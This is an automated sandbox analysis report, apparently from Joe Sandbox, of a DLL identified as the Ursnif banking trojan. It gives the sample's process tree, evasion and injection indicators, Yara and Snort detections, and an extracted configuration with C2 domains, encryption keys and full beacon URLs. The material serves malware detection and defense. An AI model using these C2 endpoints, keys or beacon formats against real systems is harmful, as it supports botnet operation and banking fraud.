Play interactive tour

Edit tour

Windows Analysis Report mental.dll

Overview

General Information

Sample Name:	mental.dll
Analysis ID:	455445
MD5:	244fcb71c16ab8163f25c633dcb91b1c
SHA1:	cf0256c44be6b311558358bb00f9ec257ec90236
SHA256:	48589e8612584c5b67c325367e53b63379dbf984a0a0dc905bd29fd3f7fd6c03
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Internet Provider seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

Queries the installation date of Windows

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6608 cmdline: loaddll32.exe 'C:\Users\user\Desktop\mental.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6624 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6644 cmdline: rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6632 cmdline: rundll32.exe C:\Users\user\Desktop\mental.dll,Behind MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6720 cmdline: rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6736 cmdline: rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5608 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5532 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3064 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "5/Y58l5cMfSS6UVE2qwUPZ8h4BZIDuitNieuSeExhGIYp38mO1KlDb9BgD8MZDpCVIqOs83i+UuS7wSTYyLzqLIpEfJvw6IqNOxE0Nj1pnQUhkMjOOyeKT26+dcTRw0X3cDnXGQeXK0BURYDVIi9qI6C9idxUYquGCxlZ3M8J0VdrIL6/2Z4IWUGU9Fobm/mPnd9dMNDYBJzN5iMU0/zCaGPmjT/gVPYhstSarstSrBXvVQck6yXEgx0w1ETruWctJSlrx1LRl0Wqr6+4Ts0TQO/lRIcDE4if5nsnojzxswoVvIRdpxV7UOjuZphAusEANjuHiVamP6ZL+7s3D+g4AuY4oLOSzm+52Ja3ImN5vo=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "MEvpZnH81JLxaRqa", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6644	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6608	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z	Avira URL Cloud: Label: malware
Source: http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000003.00000003.773640862.0000000000780000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "5/Y58l5cMfSS6UVE2qwUPZ8h4BZIDuitNieuSeExhGIYp38mO1KlDb9BgD8MZDpCVIqOs83i+UuS7wSTYyLzqLIpEfJvw6IqNOxE0Nj1pnQUhkMjOOyeKT26+dcTRw0X3cDnXGQeXK0BURYDVIi9qI6C9idxUYquGCxlZ3M8J0VdrIL6/2Z4IWUGU9Fobm/mPnd9dMNDYBJzN5iMU0/zCaGPmjT/gVPYhstSarstSrBXvVQck6yXEgx0w1ETruWctJSlrx1LRl0Wqr6+4Ts0TQO/lRIcDE4if5nsnojzxswoVvIRdpxV7UOjuZphAusEANjuHiVamP6ZL+7s3D+g4AuY4oLOSzm+52Ja3ImN5vo=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "MEvpZnH81JLxaRqa", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for domain / URL

Show sources

Source: gtr.antoinfer.com

Virustotal: Detection: 7%

Perma Link

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_00DE39C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007939C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_007939C5

Source: mental.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: mental.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\135\Dark\841\582_Free\Thin\Segment.pdb source: loaddll32.exe, rundll32.exe, mental.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49741 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49741 -> 185.228.233.17:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49746 -> 185.228.233.17:80

Source: Joe Sandbox View

ASN Name: ITOS-ASRU ITOS-ASRU

Source: global traffic	HTTP traffic detected: GET /02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: gtr.antoinfer.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_00DE39C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_007939C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		3_2_007939C5

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D471EC7 NtMapViewOfSection,	0_2_6D471EC7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D471B9C GetProcAddress,NtCreateSection,memset,	0_2_6D471B9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472485 NtQueryVirtualMemory,	0_2_6D472485
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00DE2D06
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE8005 NtQueryVirtualMemory,	0_2_00DE8005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00792D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_00792D06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00798005 NtQueryVirtualMemory,	3_2_00798005

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472264	0_2_6D472264
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE2206	0_2_00DE2206
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE7DE0	0_2_00DE7DE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE3109	0_2_00DE3109
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48DCB0	0_2_6D48DCB0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48C9A5	0_2_6D48C9A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48387C	0_2_6D48387C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48B024	0_2_6D48B024
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D47FE5A	0_2_6D47FE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00792206	3_2_00792206
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00793109	3_2_00793109
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00797DE0	3_2_00797DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48DCB0	3_2_6D48DCB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48C9A5	3_2_6D48C9A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48387C	3_2_6D48387C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48B024	3_2_6D48B024
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D47FE5A	3_2_6D47FE5A

Source: mental.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal88.troj.winDLL@16/8@2/2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00DE513E CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00DE513E

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9D47ABEC-EF99-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF6E67667E2D178577.TMP

Jump to behavior

Source: mental.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Behind

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\mental.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Behind
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Behind	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Factpresent	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mental.dll,Steadunder	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5608 CREDAT:17420 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: mental.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: mental.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: c:\135\Dark\841\582_Free\Thin\Segment.pdb source: loaddll32.exe, rundll32.exe, mental.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471F7C LoadLibraryA,GetProcAddress,

0_2_6D471F7C

Source: mental.dll

Static PE information: real checksum: 0x62305 should be: 0x670d4

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472253 push ecx; ret	0_2_6D472263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D472200 push ecx; ret	0_2_6D472209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE7A60 push ecx; ret	0_2_00DE7A69
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00DE7DCF push ecx; ret	0_2_00DE7DDF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D48FC77 push ecx; ret	0_2_6D48FC78
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D490CBF push ss; ret	0_2_6D490CE4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D47F7C5 push ecx; ret	0_2_6D47F7D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D493AAC push ecx; retf	0_2_6D493AB1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CBA1A push A00002CFh; iretd	0_2_6D4CBA21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00797A60 push ecx; ret	3_2_00797A69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00797DCF push ecx; ret	3_2_00797DDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4941C6 pushad ; iretd	3_2_6D4941CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D48FC77 push ecx; ret	3_2_6D48FC78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D490CBF push ss; ret	3_2_6D490CE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D493F7D pushad ; ret	3_2_6D493FC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D47F7C5 push ecx; ret	3_2_6D47F7D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D493AAC push ecx; retf	3_2_6D493AB1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CBA1A push A00002CFh; iretd	3_2_6D4CBA21

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
